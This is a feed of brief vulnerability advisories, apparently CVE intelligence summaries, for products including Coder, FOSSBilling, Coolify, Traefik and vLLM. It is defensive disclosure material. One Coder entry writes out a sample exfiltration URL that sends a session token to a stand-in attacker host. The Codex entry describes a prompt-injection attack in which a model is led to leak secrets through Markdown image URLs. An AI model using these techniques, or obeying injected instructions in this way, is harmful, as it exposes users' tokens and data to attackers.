OS command injection in create-react-app's react-dev-utils component enables remote code execution on macOS developer workstations running version 5.0.1 or earlier. The vulnerability resides in the startBrowserProcess function of openBrowser.js, which processes unsanitized input that reaches a shell invocation. A publicly available proof-of-concept exploit exists via the project's GitHub issue tracker; no vendor patch has been released and the maintainers have not responded to disclosure, leaving the entire supported version history of this widely-used but now-archived tool permanently unpatched.
Header injection in Traefik's ForwardAuth middleware allows unauthenticated remote attackers to manipulate the X-Forwarded-Port value sent to authentication backends, enabling bypass of port-based authorization checks. Affected are all Traefik v2.x prior to v2.11.51, v3.6.x from 3.0.0 prior to v3.6.22, and v3.7.x from 3.7.0 prior to v3.7.6. The flaw persists even when the trustForwardHeader: false safeguard is active, because the port derivation logic reads the original incoming request rather than the sanitized forwarded context. No public exploit code has been identified at time of analysis, and vendor-released patches are available.
Improper access control in Formbricks 5.0.0 allows remote unauthenticated attackers to bypass authorization checks in the link survey handler, enabling unauthorized manipulation of survey data with limited integrity and availability impact. The flaw resides in the Survey Handler component (apps/web/modules/survey/link/actions.ts) and is tagged as an authentication bypass, confirmed by the CVSS 4.0 PR:N metric indicating no credentials are required. No active exploitation has been confirmed and no public exploit code has been identified; a patch is available as release candidate 5.1.0-rc.1.
Traffic hijacking in Cilium's CiliumLocalRedirectPolicy (CLRP) mechanism allows a cluster user with RBAC permission to create CLRPs to specify arbitrary ClusterIPs via the addressMatcher field, redirecting service traffic across namespace boundaries and circumventing the namespace-scoping guarantees that serviceMatcher is designed to enforce. Affected versions span Cilium v1.17 (all prior to v1.17.16), v1.18.2-v1.18.9, and v1.19.0-v1.19.3. A compounding secondary behavior causes complete service translation failure when a maliciously crafted CLRP is deleted, enabling a denial-of-service condition against any targeted Service. No public exploit has been identified at time of analysis, and exploitation is constrained to users holding elevated cluster RBAC privileges; this is not confirmed actively exploited (CISA KEV).
Unauthenticated mass assignment in FOSSBilling's client self-registration endpoint (all versions prior to 0.8.0) allows any visitor to inject an arbitrary client group identifier during signup, bypassing group-based access controls on promotional codes. Attackers who successfully place themselves into a privileged group can redeem group-restricted discount codes and receive unauthorized price reductions. No public exploit or active exploitation has been identified; the CVSS 4.0 score of 6.9 reflects a limited, integrity-only impact with no confidentiality or availability consequence, and the erroneous 'RCE' source tag should be disregarded as inconsistent with the description and impact metrics.
Race condition in FOSSBilling's cart checkout flow allows authenticated clients to exploit promo codes beyond their configured usage limits by submitting concurrent checkout requests. Affected versions prior to 0.8.0 fail to atomically check and increment promo code usage counts (CWE-367), enabling a single limited-use or one-time-use code to be redeemed unlimited times. No public exploit code has been identified at time of analysis, and the vulnerability is not listed in CISA KEV, but the attack is straightforward to automate for any authenticated user with knowledge of a valid promo code.
SQL injection in FOSSBilling's Massmailer module exposes the application database to read access by authenticated administrators who can supply crafted filter values during mass email message updates. Affected versions span 0.6.0 through 0.7.2, with the fix shipped in version 0.8.0. No public exploit code or active exploitation (CISA KEV) has been identified at time of analysis, but the high confidentiality impact (VC:H per CVSS 4.0) means a malicious or compromised administrator account could extract sensitive billing and client data from the underlying database.
Cross-origin request forgery via CORS same-owner bypass in Coder's subdomain workspace app proxy allows an authenticated attacker to exfiltrate data from a victim's workspace apps. The flaw exists across Coder release lines 2.29 through 2.34, and was disclosed by Anthropic's Security Team. No public exploit exists and no CISA KEV listing is present, but the vulnerability is directly exploitable against any deployment with wildcard subdomain routing enabled, making prompt patching critical for affected configurations.
Cross-boundary information disclosure in Coder's workspace app proxy allows an attacker who controls a shared workspace app to read a victim user's private app responses by forging the X-Forwarded-Host header. The proxy trusts this client-supplied header for routing decisions while simultaneously authorizing the request with the victim's own session cookie - which the browser attaches to any subdomain because cookies are scoped to the wildcard parent domain - enabling the attacker to steer responses from private apps back through their own JavaScript. Exploitation requires subdomain app routing (wildcard hostname) to be enabled and the victim to visit the attacker's shared app; no public exploit code or CISA KEV listing has been identified at time of analysis.
Uncontrolled memory allocation in Coder's provisioner daemon allows an authenticated user to crash the entire coderd deployment with a single ~50-byte network message. The vulnerability exists in the NewDataBuilder function within provisionersdk/proto/dataupload.go, which blindly allocates a byte slice using a client-supplied FileSize field from a DataUpload DRPC message, with no upper-bound validation. By declaring a massive FileSize value such as 1 TiB, an attacker with provisioner daemon credentials can trigger a Go runtime out-of-memory abort, terminating coderd and denying service to all users of the deployment. No public exploit code has been identified and this vulnerability is not listed in CISA KEV at time of analysis.
Denial of service in Coder's coderd server allows any authenticated user with file-upload access to exhaust server memory by uploading a crafted zip bomb via POST /api/v2/files, crashing the service before RBAC checks execute. Affected versions span all supported release lines prior to v2.34.2, v2.33.8, v2.32.7, and v2.29.17 (ESR). No public exploit has been identified at time of analysis; the impact is strictly an availability loss - the advisory explicitly confirms no data disclosure or code execution is possible, contradicting the 'RCE' tag present in the intelligence feed.
Memory exhaustion in Coder's AI Bridge feature allows an authenticated member-level user to crash the entire control plane by sending arbitrarily large HTTP request bodies to provider endpoints such as `/api/v2/aibridge/anthropic/v1/messages`. Because AI Bridge runs in-process with `coderd`, a single crafted request can grow heap memory until the OS terminates the process, taking down the API server, workspace coordinator, and DERP relay simultaneously. No public exploit has been identified at time of analysis, but the vendor credits Anthropic's Security Team (ANT-2026-22443) with independent discovery, indicating external security research attention. Patched versions are available for the affected v2.33 and v2.34 release lines.
Denial of service in NATS Server (nats-io/nats-server) affects the HTTP monitoring endpoints /connz and /subsz, where attacker-controlled offset and limit pagination parameters trigger a signed integer overflow (Offset+Limit wrapping from math.MaxInt64 to math.MinInt64), producing invalid slice bounds and a server panic. Any client able to reach the monitoring interface can crash the broker, disrupting all connected messaging clients. There is no public exploit identified at time of analysis and the issue is not in CISA KEV; the upstream fix clamps offsets using min/max bounds.
CVE-2026-58251 has been reported by Ubuntu with no description, CVSS score, CWE classification, or technical details available at time of analysis. The affected component, attack vector, and impact are entirely unknown. No exploitation status, patch availability, or severity rating can be determined from the provided intelligence.
CVE-2026-58252 is attributed to Ubuntu per vendor reporting, but no description, CVSS score, CWE classification, or technical details are available in the provided intelligence data. The vulnerability cannot be characterized beyond its association with the Ubuntu platform. Security teams should consult Ubuntu Security Notices (USN) directly for authoritative details as this record is effectively unpopulated.
Unauthenticated access to Coolify's POST /api/feedback endpoint allows any remote attacker to forward arbitrary content directly to the operator's configured Discord webhook, enabling spam flooding, content injection, and webhook rate-limit abuse. All self-hosted Coolify instances prior to 4.0.0-beta.474 are affected, with CVSS AV:N/AC:L/PR:N/UI:N confirming zero-barrier network exploitation. No public exploit code has been identified at time of analysis, and the vulnerability is not listed in the CISA KEV catalog, but the trivial exploit conditions (plain unauthenticated HTTP POST) make automated abuse straightforward.
Memory exhaustion in vLLM 0.22.0-0.23.0 allows authenticated API callers to crash or destabilize the inference server by uploading arbitrarily large audio files. The `/v1/audio/transcriptions` and `/v1/audio/translations` endpoints invoke `request.file.read()` to fully buffer multipart uploads into process memory before the `VLLM_MAX_AUDIO_CLIP_FILESIZE_MB` size guard is evaluated, meaning the size limit is checked only after the damage is done. No public exploit is identified at time of analysis; vendor-confirmed fix is available in version 0.24.0.
Missing authorization in Coolify's Settings/Updates Livewire component allows any authenticated non-admin user to access the Updates settings page and modify auto-update behavior or trigger update checks. Affected versions span all releases prior to 4.0.0-beta.471 of the self-hosted server management platform. No public exploit code or CISA KEV listing exists at time of analysis, but the network-accessible nature and low authentication bar (any valid account) make this a meaningful integrity risk in multi-tenant or shared Coolify deployments.
Incorrect authorization in Coolify's API layer allows any holder of a read-scoped API token to invoke mutating validation endpoints - including cloud token validation and server validation - that should require write-level privileges. All Coolify deployments prior to version 4.0.0-beta.466 are affected. No public exploit or active exploitation has been identified at time of analysis, but the low attack complexity and network accessibility via API make this straightforward to abuse for any user who has been issued even a minimal API token.
Memory exhaustion via uncontrolled recursion in Mojo::JSON's pure-Perl decoder allows network-accessible callers to cause denial of service in Mojolicious applications. All versions before 9.47 are affected when the pure-Perl decode path is active - specifically when Cpanel::JSON::XS is absent or MOJO_NO_JSON_XS=1 is set. No public exploit has been identified and EPSS sits at 0.19% (8th percentile), but the attack is conceptually trivial given the published patch diff and OSS-Security advisory.
Remote image auto-fetch in the OpenAI Codex desktop app for macOS (versions prior to 26.527.31326) enables silent exfiltration of session secrets via indirect prompt injection. An attacker who can place malicious instructions into content processed by Codex - such as a tool result, API response, or file read during a session - can manipulate the model into generating a Markdown image tag whose URL encodes sensitive data; the app then automatically fetches that URL, transmitting API keys, source code, or tool-returned data to an attacker-controlled server with no additional user action. No active exploitation is confirmed (not listed in CISA KEV), no public proof-of-concept is identified, and EPSS sits at 0.16% (6th percentile), indicating low current exploitation probability despite the high-value target profile of affected users.
Stored Cross-Site Scripting in the Reviews Widgets for Google, Yelp & TripAdvisor WordPress plugin (versions up to and including 2.7.3) allows authenticated attackers with contributor-level access to inject persistent malicious scripts into pages by abusing the 'page_id' attribute of the [fbrev] shortcode. The injected payload executes in the browsers of any user who subsequently visits the affected page, enabling session hijacking, credential theft, or further exploitation within the victim's browser context. No public exploit code has been identified at time of analysis, and no KEV listing is present, but the contributor-level access bar is low in multi-author WordPress deployments.
Filter context poisoning in Traefik v3.7.0-v3.7.5 allows a low-privileged Kubernetes user to cause security-sensitive backendRef filters - such as tenant identity or authorization headers trusted by the backend - to be applied to requests from a different, co-located HTTPRoute that targets the same backend Service:port. This affects multi-tenant Kubernetes Gateway API deployments and can cross namespace boundaries when a ReferenceGrant permits cross-namespace backend targeting, making it an authorization bypass and tenant-isolation failure. No public exploit identified at time of analysis; the issue is fixed in Traefik v3.7.6.
Session token leakage in Coder's CLI (github.com/coder/coder v2) lets a malicious template author steal a user's session token when the victim runs `coder open app`. The `coder open app` command opens external workspace-app URLs without scheme/host validation and substitutes the `$SESSION_TOKEN` placeholder with the user's real token before passing the URL to the OS open handler, so a workspace-controlled URL like `https://attacker.example/?t=$SESSION_TOKEN` exfiltrates the token and enables full account impersonation for its lifetime; the same path can invoke arbitrary local URI-scheme handlers. No public exploit identified at time of analysis, and it is not listed in CISA KEV.
Reflected cross-site scripting across at least eight WSO2 platform products - including Identity Server, API Manager, API Control Plane, Traffic Manager, Universal Gateway, Open Banking AM/IAM, and Identity Server as Key Manager - allows unauthenticated remote attackers to inject arbitrary script via unsanitized URL parameters. An attacker who tricks an authenticated user into clicking a crafted link can redirect the victim to a malicious site, tamper with rendered page content, or exfiltrate non-session browser data; partial mitigation is provided by httpOnly flags on session cookies, which block direct session token theft. No public exploit identified at time of analysis; WSO2 self-reported the issue and published advisory WSO2-2025-4343.
Open redirect in Kiwi TCMS's account confirmation endpoint allows unauthenticated remote attackers to craft URLs hosted on a legitimate organizational Kiwi TCMS instance that silently redirect victims to arbitrary external domains. All deployments running versions prior to v16.1 are affected, with no authentication required from the attacker - only a victim click. The primary threat is high-trust phishing: because the malicious link originates from the organization's own hostname, it bypasses email security filters and link-reputation checks, enabling convincing credential-harvesting or malware delivery campaigns targeting engineering and QA staff. No active exploitation is confirmed (not in CISA KEV), and no public exploit code has been identified at time of analysis.
Path traversal in the T-Systems TAO 2.0 suite - spanning Archivo, MyTAO, Estima, and BuroWeb - allows an authenticated low-privileged attacker to escape the application's intended file scope via crafted paths submitted to web-based file management or upload features, yielding high confidentiality impact. The CVSS 4.0 vector confirms network accessibility with low privileges required and an additional attack prerequisite (AT:P), tempering the otherwise straightforward exploitation profile. A vendor patch is available per INCIBE advisory; no public exploit code or CISA KEV listing has been identified at time of analysis.
Symlink traversal in Hugo's virtual filesystem (v0.123.0-v0.163.0) allows a symlink planted inside a theme or local mount to escape the mount sandbox and return the contents of arbitrary files accessible to the OS user running the hugo build. A regression in RootMappingFs.statRoot introduced a Stat call where Lstat was required, silently resolving symlinks that cross mount boundaries. No public exploit code or CISA KEV listing exists; the issue is fixed in v0.163.1.
Improper authorization in SourceCodester Online Examination & Learning Management System 1.0 allows unauthenticated remote attackers to manipulate enrollment records by supplying arbitrary student_id, schedule_id, or action values to /ajax_enroll.php. The vulnerability is an Insecure Direct Object Reference (IDOR) - the application performs no ownership or privilege check before processing enrollment actions on behalf of any student. A public proof-of-concept has been disclosed (referenced by VulDB submission 850695 and GitHub advisory OE-LMS-IDOR-ajax_enroll.md); no active exploitation via CISA KEV has been confirmed at time of analysis.
Null Pointer Dereference in Adobe DNG SDK versions 1.7.1 build 2536 and earlier allows an attacker to crash any application embedding the SDK by supplying a specially crafted DNG file. The flaw is strictly a denial-of-service with no confidentiality or integrity impact, and requires a victim to open the malicious file, constraining realistic exposure to imaging pipelines or end-user applications that ingest untrusted DNG content. No public exploit code and no active exploitation have been identified at time of analysis.
Subkey rollback protection in OP-TEE OS versions 3.20.0 through 4.10.x is completely non-functional due to a missing field assignment in the Trusted Application loading pipeline, allowing revoked or downgraded subkeys to authenticate TAs without detection. A locally authenticated attacker who can supply TA binaries to the REE filesystem loader can bypass the entire key-chain revocation model, loading previously invalidated trusted code into the TrustZone secure world. No public exploit has been identified at time of analysis and this is not listed in CISA KEV, but the integrity impact is categorical - the rollback database never advances, permanently defeating the control for any deployment relying on subkey-based TA signing chains.
Integer overflow in GIMP's PlayStation TIM image loader crashes the plug-in when processing a maliciously crafted TIM file, resulting in denial of service. The flaw affects GIMP as packaged on Red Hat Enterprise Linux 6 through 9, where the TIM loader multiplies two 16-bit unsigned short values (num_colors × num_cluts) without bounds checking, producing a 32-bit overflow that corrupts CLUT size calculation and triggers an abort. No public exploit code has been identified at time of analysis, and exploitation requires user interaction to open a crafted file, limiting real-world impact to targeted social engineering scenarios.
Heap overflow in OP-TEE's ARM Crypto Extensions SHA-3 implementation corrupts TEE kernel memory across all platforms built with CFG_CRYPTO_WITH_CE82=y (ARMv8.2+ SHA3 extensions). The off-by-one error in the accelerated SHA-3 path overwrites memory beyond the hash state buffer, potentially corrupting all TEE kernel heap memory that follows. Affected versions span 3.21.0 through 4.11.0, and no public exploit has been identified at time of analysis, though the memory corruption primitive is significant in the context of a secure enclave.
Authorization bypass in the Coder devcontainer recreate endpoint allows any authenticated user holding only read-level workspace access - such as Template Admin or Org Template Admin roles - to trigger a destructive container rebuild that destroys uncommitted in-container state. Unlike the sibling delete endpoint, which correctly enforces an ActionUpdate check, the recreate endpoint relied solely on route middleware verifying ActionRead, leaving the destructive operation unguarded against lower-privileged principals. No public exploit has been identified at time of analysis; vendor-confirmed patches are available across all supported release lines.
Incorrect authorization in Coder's AI Bridge proxy (introduced in v2.30.0) permits suspended users to continue accessing LLM proxy endpoints using previously issued, unexpired API keys. The `Server.IsAuthorized` function in `coderd/aibridgeserver` validates key format, expiry, secret, and deleted/system-user status but omits the active/suspended status check present in the standard API key middleware, creating a divergence that survives indefinitely until tokens expire or are manually deleted. No public exploit code exists and the flaw is not listed in CISA KEV; the vendor patched all active release lines following coordinated disclosure by Anthropic's Security Team (ANT-2026-22446).
Port-sharing policy bypass in Coder's CreateSubAgent RPC allows an authenticated workspace owner to register sub-agent apps at sharing levels exceeding the template's administrator-configured MaxPortSharingLevel, potentially exposing workspace apps as PUBLIC to unauthenticated users via wildcard app subdomains. Exploitation is gated behind authenticated workspace ownership with an agent token and requires an Enterprise deployment with both port-sharing policy enforcement and wildcard app hostnames active - making this a meaningful privilege escalation within a constrained environment rather than a broadly exploitable network flaw. No public exploit has been identified at time of analysis; vendor-released patches are available across all supported release lines.
Stored cross-site scripting in Coder's AgentLogLine dashboard component allows any workspace owner to inject arbitrary HTML into agent log output, which renders as live markup in the browser session of any user - including administrators - who views the workspace page. The vulnerability stems from the ansi-to-html library being invoked without escapeXML: true, with output passed directly to React's dangerouslySetInnerHTML without server-side sanitization. While Coder's Content Security Policy blocks inline script execution, the attack surface still includes meta refresh redirects, CSS-based data exfiltration, UI redressing, and external image beacons; no public exploit is identified at time of analysis, and patched versions are available across all supported release lines.
CVE-2026-58211 was reported by Ubuntu with no description, CVSS score, CWE, or technical detail available at time of analysis. The affected product, vulnerability class, and impact cannot be determined from available data. Security teams should monitor the Ubuntu security tracker and NVD for updates before assessing risk.
Clickjacking in Ajenti's browser-facing login and administrative UI through v2.2.13 exposes authenticated administrators to UI redress attacks. The root cause is in ajenti-core/aj/http.py, where the core HTTP response pipeline finalizes responses via WSGI without injecting X-Frame-Options or a Content-Security-Policy frame-ancestors directive, allowing the Ajenti UI to be embedded in attacker-controlled iframes. No active exploitation has been identified - EPSS sits at 0.14% (4th percentile), SSVC exploitation is rated none, and no CISA KEV listing exists - placing this firmly in the low-urgency queue despite its medium CVSS score.
CVE-2026-58254 has been reported through Ubuntu's vendor channel, but no description, CVSS score, CWE classification, or technical details are available in the provided intelligence data. The affected product, vulnerability class, and impact cannot be characterized at this time. No meaningful synthesis is possible without a description, patch reference, or advisory content.
Sandbox boundary enforcement failure in PentAGI (vxcontrol) versions up to 2.1.0 allows authenticated remote users to break Docker containment controls via the Docker API client component in `backend/pkg/docker/client.go`, enabling limited information disclosure and unauthorized low-impact modifications within the Docker environment. The CVSS 4.0 vector (PR:L, AV:N, AC:L) confirms low-privilege network-reachable exploitation with no user interaction required, though all impact metrics remain Low and no host-level breakout is indicated. No public exploit code exists and this vulnerability is not listed in CISA KEV; an upstream fix is pending as an unmerged GitHub pull request.
Incorrect authorization in FOSSBilling versions 0.5.6 through 0.7.2 allows authenticated clients with unverified email addresses to bypass the 'Require Email Confirmation' access control gate and read sensitive financial account data - including wallet balances and full transaction history - across all client-area pages. The application maintains two separate authorization layers: an API-level guard that correctly restricts unverified clients, and a page-level routing guard that is overly permissive, admitting any request whose URL path begins with /client, creating an exploitable enforcement gap. No public exploit has been identified at time of analysis; the CVSS 4.0 score of 5.3 reflects a realistic but bounded confidentiality impact gated behind prior authentication.
Authorization bypass in Craft CMS up to 4.18.0.1 allows authenticated low-privilege users to invoke the reorder-sets endpoint and manipulate Global Set ordering outside their authorized scope. The flaw resides in the actionReorderSets function of GlobalsController.php and is classified as CWE-639 (Authorization Bypass Through User-Controlled Key), an IDOR-class root cause where resource-level permission checks are absent. No public exploit has been identified at time of analysis and no CISA KEV listing exists; a vendor-released patch is available in version 4.18.1.
Improper authorization in Craft CMS up to 4.18.0.1 allows authenticated low-privileged users to access new user statistics for arbitrary user groups via the Charts endpoint. The flaw resides in the `actionGetNewUsersData` function within `src/controllers/ChartsController.php`, where the `userGroupId` parameter is not properly validated against the requesting user's authorization scope, enabling horizontal privilege escalation to read data across user group boundaries. No public exploit has been identified at time of analysis, but a vendor-released patch is available in version 4.18.1.
Stored cross-site scripting in the showdown JavaScript Markdown-to-HTML library allows an unauthenticated attacker to inject arbitrary HTML and script-executing SVG elements by placing double-quote characters inside Markdown table headers. The unescaped content is written directly into HTML id attributes by the parseHeaders function in src/subParsers/makehtml/tables.js, and the payload is stored and later executed in every victim's browser that views the rendered output. No active exploitation has been confirmed (not in CISA KEV) and no EPSS data was supplied, but the default github flavor configuration means most showdown deployments are affected without any non-default setup required.
Cross-site scripting in Showdown (all versions ≤ 2.1.0) allows network-accessible injection of arbitrary HTML and JavaScript into rendered pages when the non-default `completeHTMLDocument` option is enabled. Unescaped `<` and `>` characters in Markdown frontmatter `title` metadata are written directly into the HTML `<title>` element, enabling title-context breakout and script execution in victim browsers. No public exploit has been identified at time of analysis and the vulnerability is not listed in CISA KEV, but the attack surface includes any web application that renders attacker-supplied Markdown with `completeHTMLDocument` enabled.
Authorization bypass in Apache Camel's camel-elasticsearch-rest-client component allows unauthenticated remote attackers to override Elasticsearch query operations by injecting HTTP headers. Because the component uses unprefixed header constants ('SEARCH_QUERY', 'OPERATION', 'INDEX_NAME', 'INDEX_SETTINGS', 'ID') that are not blocked by Camel's inbound HttpHeaderFilterStrategy - which filters only 'Camel'-prefixed names - any HTTP client reaching a Camel route that fronts an elasticsearch-rest-client producer can substitute their own query body, operation type, or target index. Practical outcomes include full index enumeration via match_all, targeted document deletion, and field-level data exfiltration. No public exploit has been identified at time of analysis and this CVE is not listed in CISA KEV, but the attack requires no credentials and is trivially reproducible from the description alone.
Symlink traversal in pydantic-settings 2.12.0-2.14.1 allows a local low-privileged attacker with write access to the configured secrets directory to read arbitrary files from the host filesystem into application settings when secrets_nested_subdir=True. The same code path also bypasses the secrets_dir_max_size loading cap, undermining an advertised safety control. No public exploit or CISA KEV listing exists; the vendor-released fix is version 2.14.2.
Memory corruption in Qualcomm Snapdragon silicon allows a local low-privileged attacker to trigger an out-of-bounds write (CWE-787) by submitting input with a buffer plane count or batch size exceeding the maximum allowed value. The scope change in the CVSS vector (S:C) indicates the corruption can escape the vulnerable component's security boundary, yielding partial confidentiality, integrity, and availability impact on an adjacent system component. No public exploit or active exploitation has been identified at time of analysis; SSVC confirms no known exploitation and non-automatable attack conditions.
Out-of-bounds write in Qualcomm Snapdragon's flash command handler allows a local low-privileged attacker to corrupt memory by exploiting a race condition between userspace LED count modifications and kernel-side flash command processing. The CVSS scope change (S:C) indicates the corruption can reach components beyond the immediately vulnerable driver - raising the potential for privilege escalation on affected Snapdragon-based devices. No public exploit code or active exploitation has been identified at time of analysis.